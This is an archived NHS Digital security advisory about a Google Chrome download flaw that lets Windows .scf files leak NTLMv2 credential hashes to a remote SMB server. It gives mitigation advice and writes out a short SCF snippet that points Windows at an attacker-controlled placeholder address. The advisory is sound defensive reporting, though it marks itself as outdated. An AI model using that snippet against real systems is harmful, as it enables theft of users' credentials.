Skip to main content

Google Chrome flaw could allow Windows credential theft

A flaw in Google Chrome's web browser could allow attackers to plant a malicious file onto a target system, which in turn could allow adversaries to exfiltrate all Windows credentials from the system and start a Server Message Block (SMB) relay attack.
Report a cyber attack: call 0300 303 5222 or email [email protected]

This content has been archived

This article no longer conforms to NHS Digital's standards for cyber alerts, and may contain outdated or inaccurate information. Use of this information contained in this page is at your own risk

Summary

A flaw in Google Chrome's web browser could allow attackers to plant a malicious file onto a target system, which in turn could allow adversaries to exfiltrate all Windows credentials from the system and start a Server Message Block (SMB) relay attack.

Affected platforms

The following platforms are known to be affected:

Threat details

Research reveals that due to the default configuration, Chrome automatically downloads the files as it is considered safe by the browser and does not prompt the user for any action,

This is a serious issue, especially while handling Windows Explorer Shell Command File or SCF (.scf) files. SCF files are a text file that launches commands without requiring any user action and can be used to trick Windows into an authentication attempt to a remote SMB server, which then, in turn, gathers victims' usernames and Microsoft LAN Manager (NTLMv2) password hash. The testing of various anti-virus solutions against the downloaded files it was found that none of them reported SCF files as suspicious which is quite critical from a host system security point of view.

The following two lines of code can make Windows attempt authentication to a remote SMB server.

[Shell] IconFile=\<ip_addr>\icon

Once this file is downloaded, an automatic request is made to view the file and the attackers’ remote SMB server captures the username and NTLMv2 password hash for offline cracking or relays the connection to an externally available service accepting the same authentication method.


Remediation steps

Type Step

Users are advised to be careful when using Chrome. Keep the application and Operating System (OS) up-to-date and use an up-to-date anti-virus program.

As a workaround, consider disabling automatic downloads in Google Chrome by checking the following preferences: Settings -> Show advanced settings -> Check the Ask where to save each file before downloading option.

Use host level hardening and configure the perimeter firewall rules to apply additional security measures such as SMB packet signing and restricting SMB traffic to the private network only.


Last edited: 17 February 2020 11:31 am